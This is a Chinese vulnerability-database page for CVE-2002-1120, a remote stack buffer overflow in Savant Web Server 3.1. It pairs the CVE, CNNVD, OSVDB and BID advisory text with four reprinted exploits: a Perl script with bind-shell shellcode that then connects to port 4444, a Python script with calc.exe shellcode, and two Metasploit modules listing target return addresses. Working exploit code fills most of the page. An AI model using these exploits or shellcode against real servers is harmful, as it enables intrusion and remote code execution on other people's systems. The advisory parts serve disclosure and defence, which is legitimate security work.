CVE-2002-1120
CVSS7.5
发布时间 :2002-09-24 00:00:00
修订时间 :2008-09-05 16:29:50
NMCOEPS    

[原文]Buffer overflow in Savant Web Server 3.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD]Savant Web Server远程缓冲区溢出漏洞(CNNVD-200209-062)

        
        Savant Web是一款小型WEB服务程序,使用在Microsoft Windows操作系统下。
        Savant Web在处理超长GET请求时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        攻击者可以提交超过291字符的GET请求给Savant Web服务程序,可导致服务程序崩溃,精心构建提交数据可能以WEB进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1120
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1120
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-062
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0112.html
(VENDOR_ADVISORY)  VULNWATCH  20020910 Foundstone Labs Advisory - Buffer Overflow in Savant Web Server
http://www.securityfocus.com/bid/5686
(VENDOR_ADVISORY)  BID  5686
http://www.iss.net/security_center/static/10076.php
(VENDOR_ADVISORY)  XF  savant-long-url-bo(10076)

- 漏洞信息

Savant Web Server远程缓冲区溢出漏洞
高危 未知
2002-09-24 00:00:00 2006-09-22 00:00:00
远程  
        
        Savant Web是一款小型WEB服务程序,使用在Microsoft Windows操作系统下。
        Savant Web在处理超长GET请求时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        攻击者可以提交超过291字符的GET请求给Savant Web服务程序,可导致服务程序崩溃,精心构建提交数据可能以WEB进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞被修补之前暂时关闭Savant Web服务。
        厂商补丁:
        Savant
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://savant.sourceforge.net

- 漏洞信息 (1184)

Savant Web Server 3.1 Remote Buffer Overflow Exploit (EDBID:1184)
windows remote
2005-08-30 Verified
80 basher13
[点击下载] [点击下载]
#!/usr/local/bin/perl
#
#   Savant Buffer Overflow Exploit
# ----------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: http://savant.sourceforge.net
#


$ARGC=@ARGV;
if ($ARGC !=3) {
    print "\nUsage: $0 [remote IP] [Port]\n";
    print "Example: $0 127.0.0.1 80 1\n";
    print "\nsystem:\n";
    print " 1 - Windows 2000 SP4\n";
    print " 2 - winXP sp1\n";
    print "\n";
    exit;
}
use Socket;

$x90 = "\x90"x13;
$pack_ret = pack('l', ($ret));

if($sistem==1){$ret = 0x77e14c29;} # Windows 2000 SP4
if($sistem==2){$ret = 0x77fb59cc;} # winXP sp1

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port =$ARGV[1];
$sistem = $ARGV[2];
print "\n";
print "[+] Connect to $remote..\n";
$iaddr = inet_aton($remote) or die "[-] Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "[-] Error: $!";
$proto = getprotobyname('tcp') or die "[-] Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
connect(SOCK, $paddr) or die "[-] Error: $!";

print "[+] Connected\n";
print "[+] Build shellcode..\n";

my $shellcode =
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x94".
"\xd3\x48\xef\x83\xeb\xfc\xe2\xf4\x68\xb9\xa3\xa2\x7c\x2a\xb7\x10".
"\x6b\xb3\xc3\x83\xb0\xf7\xc3\xaa\xa8\x58\x34\xea\xec\xd2\xa7\x64".
"\xdb\xcb\xc3\xb0\xb4\xd2\xa3\xa6\x1f\xe7\xc3\xee\x7a\xe2\x88\x76".
"\x38\x57\x88\x9b\x93\x12\x82\xe2\x95\x11\xa3\x1b\xaf\x87\x6c\xc7".
"\xe1\x36\xc3\xb0\xb0\xd2\xa3\x89\x1f\xdf\x03\x64\xcb\xcf\x49\x04".
"\x97\xff\xc3\x66\xf8\xf7\x54\x8e\x57\xe2\x93\x8b\x1f\x90\x78\x64".
"\xd4\xdf\xc3\x9f\x88\x7e\xc3\xaf\x9c\x8d\x20\x61\xda\xdd\xa4\xbf".
"\x6b\x05\x2e\xbc\xf2\xbb\x7b\xdd\xfc\xa4\x3b\xdd\xcb\x87\xb7\x3f".
"\xfc\x18\xa5\x13\xaf\x83\xb7\x39\xcb\x5a\xad\x89\x15\x3e\x40\xed".
"\xc1\xb9\x4a\x10\x44\xbb\x91\xe6\x61\x7e\x1f\x10\x42\x80\x1b\xbc".
"\xc7\x90\x1b\xac\xc7\x2c\x98\x87\xeb\xd3\x48\xee\xf2\xbb\x4f\x53".
"\xf2\x80\xc1\x0e\x01\xbb\xa4\x16\x3e\xb3\x1f\x10\x42\xb9\x58\xbe".
"\xc1\x2c\x98\x89\xfe\xb7\x2e\x87\xf7\xbe\x22\xbf\xcd\xfa\x84\x66".
"\x73\xb9\x0c\x66\x76\xe2\x88\x1c\x3e\x46\xc1\x12\x6a\x91\x65\x11";

# If Savant can serve HTTP requests with a server socket to receive the requests,
# the Savant server will keep online when this error occurs.
# Most often, this can by try to simultaneously run two web servers.
# Also this could Allows attacker to bind a port

$sploit =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";

$all = $x90.$shellcode;
$get = "GET /$x90.$shellcode.$sp4 \r\n\n";
$shell = $pack_ret.$sploit.$x90;
print "[+] Sending overflOw..\n";
send(SOCK, $get, 0) or die "[-] Failed query: $!";
sleep(1);
print "[+] Server Overflow!\n";
print "[+] Send SplOit..\n";
send(SOCK, $shell, 0) or die "[-] Failed query: $!";
sleep(1);
print "[+] Granted!\n";
close(SOCK);
print "[~] Trying connect $remote port 4444\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "4444", Photo => tcp)
|| die "[-] FAILED ...\n";
close($socket);
print "[+] PWNED rulz port 4444 ...\n";
exit;

// milw0rm.com [2005-08-30]
		

- 漏洞信息 (10434)

Savant Web Server 3.1 Remote Buffer Overflow Exploit (EDBID:10434)
windows remote
2009-12-14 Verified
80 DouBle_Zer0
[点击下载] [点击下载]
#!/usr/bin/python

#Title: Savant web server 3.1 buffer overflow exploit
#Author: DouBle_Zer0 
#Version: 3.1
#Tested on: win xp sp2,3 [en]
#Vulnerability discovered by Muts(offensive security)
#\x83\xc4\x50\x54\xc3 -add esp,50 push esp ret[see the double dance of this in exploit]
#ret=00401D09[pop ebp, ret]


import socket,sys
# win calc.exe [metasploit] (172 byte)
host = sys.argv[1] 
buff = ("\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
buff3 = "\x90" * 30
buff2 = "\x90" * 53
ret =   "\x09\x1D\x40" #savant.exe 
buffr = '\x83\xC4\x50\x54\xc3 /' +buff2+buff3+buff+ret + '\r\n\r\n'
print buffr
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,80))
s.send(buffr)
sys.exit()		

- 漏洞信息 (16770)

Savant 3.1 Web Server Overflow (EDBID:16770)
windows shellcode
2010-10-04 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: savant_31_overflow.rb 10546 2010-10-04 20:53:51Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Savant 3.1 Web Server Overflow',
			'Description' => %q{
					This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
				supports a maximum of 10 threads (for a default install). Each exploit attempt
				generally causes a thread to die whether sucessful or not. Therefore, in a default
				configuration, you only have 10 chances.

				Due to the limited space available for the payload in this exploit module, use of the
				"ord" payloads is recommended.
			},
			'Author'      => [ 'patrick' ],
			'Arch'		  => [ ARCH_X86 ],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 10546 $',
			'References'  =>
				[
					[ 'CVE', '2002-1120' ],
					[ 'OSVDB', '9829' ],
					[ 'BID', '5686' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/787' ],
				],
			'Privileged'  => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'	  =>
				{
					'Space'			   => 253,
					'BadChars'        => "\x00\x0a\x0d\x25",
					'StackAdjustment' => -3500,
					'Compat'          =>
						{
							'ConnectionType' => '+ws2ord',
						},
				},
			'Platform'    => ['win'],
			'Targets'     =>
				[
					# Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
					[ 'Universal Savant.exe', 	    { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
					[ 'Windows XP Pro SP2 - English',   { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
				],
			'DisclosureDate' => 'Sep 10 2002',
			'DefaultTarget' => 0))
	end

	def check
		info = http_fingerprint  # check method
		if info and (info =~ /Savant\/3\.1/)
			return Exploit::CheckCode::Vulnerable
		end
		Exploit::CheckCode::Safe
	end


	def safe_nops(count)
		# We need to find a safe nop combination.
		# Savant will change some chars in the http method type - anything before the "/".
		#
		# For example, "GET /" will remain "GET /", however
		# "\xe0 /" will be modified to "\xc0 /" ...
		# "\xfe /" will be modified to "\xde /" ...
		# "\xff /" will be modified to "\x9f /"
		# The code after the "/" - our payload - is unchanged >=)
		#
		# Savant bad_chars for the nops

		bad_nop_chars = [*(0xe0..0xff)].pack("C*")

		nopsled = make_nops(count) # make_nops includes the payload bad_chars
			bad_nop_chars.each_byte { |badbyte|
				nopsled.each_byte { |goodbyte|
				if (goodbyte == badbyte)
					return false
				end
			}
		}
		return nopsled
	end


	def exploit
		print_status("Searching for a suitable nopsled...")
		findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
		until findnop
			findnop = safe_nops(24) # If nops are banned, generate a new batch.
		end

		print_status("Found one! Sending exploit.")
		sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
		res = send_request_raw(
			{
				'method'  => sploit,
				'uri'     => '/'
			}, 5)
		if (res)
			print_error('The server responded, that can\'t be good.')
		end

		handler
	end

end
		

- 漏洞信息 (F82967)

Savant 3.1 Web Server Overflow (PacketStormID:F82967)
2009-11-26 00:00:00
patrick  metasploit.com
exploit,web,overflow
CVE-2002-1120
[点击下载]

This Metasploit module exploits a stack overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether successful or not. Therefore you only have 10 chances (unless non-default).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'Savant 3.1 Web Server Overflow',
			'Description'	=> %q{
			This module exploits a stack overflow in Savant 3.1 Web Server. The service
			supports a maximum of 10 threads (for a default install). Each exploit attempt
			generally causes a thread to die whether sucessful or not. Therefore you only
			have 10 chances (unless non-default).
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2002-1120' ],
				[ 'OSVDB', '9829' ],
				[ 'BID', '5686' ],
				[ 'URL', 'http://www.milw0rm.com/exploits/787' ],
			],
			'Privileged'		=> false,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 253,
					'BadChars' 		=> "\x00\x0a\x0d%",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				# Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
				[ 'Universal Savant.exe', 	    { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
				[ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
				[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
				[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
				[ 'Windows XP Pro SP2 - English',   { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
			],
			'DisclosureDate' => 'Sep 10 2002',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(80),
			],self.class)
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /Savant\/3.1/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def safe_nops(count)
		# We need to find a safe nop combination.
		# Savant will change some chars in the http method type - anything before the "/".
		#
		# For example, "GET /" will remain "GET /", however
		# "\xe0 /" will be modified to "\xc0 /" ...
		# "\xfe /" will be modified to "\xde /" ...
		# "\xff /" will be modified to "\x9f /" 
		# The code after the "/" - our payload - is unchanged >=)
		#
		# Savant bad_chars for the nops
		
		bad_nop_chars =[*(0xe0..0xff)].pack("C*")

		nopsled = make_nops(count) # make_nops includes the payload bad_chars
			bad_nop_chars.each_byte{ |badbyte|
				nopsled.each_byte { |goodbyte|
				if (goodbyte == badbyte)
					return false
				end
			}
		}
		return nopsled
		end

	def exploit
		connect

		print_status("Searching for a suitable nopsled...")

		findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
		until findnop
			findnop = safe_nops(24) # If nops are banned, generate a new batch.
		end
		
		print_status("Found one! Sending exploit.")

		sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end
end
    

- 漏洞信息

9829
Savant Web Server HTTP GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in Savant Web Server. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted GET request containing 291 or more characters, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2002-09-10 2002-08-16
2002-09-10 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Savant Webserver Buffer Overflow Vulnerability
Unknown 5686
Yes No
2002-09-10 12:00:00 2008-02-01 09:17:00
Discovered by Robin Keir.

- 受影响的程序版本

Savant Savant Webserver 3.1

- 漏洞讨论

A buffer-overflow vulnerability has been reported in Savant webserver. If the argument to a GET request exceeds 291 bytes in length, a stack overrun will occur. Remote attackers may be exploit this condition to execute arbitrary instructions on the affected host.

- 漏洞利用

A proof-of-concept program has reportedly been developed, but is not public.

The following example is available:

Any_Text / [256 Bytes]\r\n

The following exploit code is available as a module for the Metasploit Framework:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站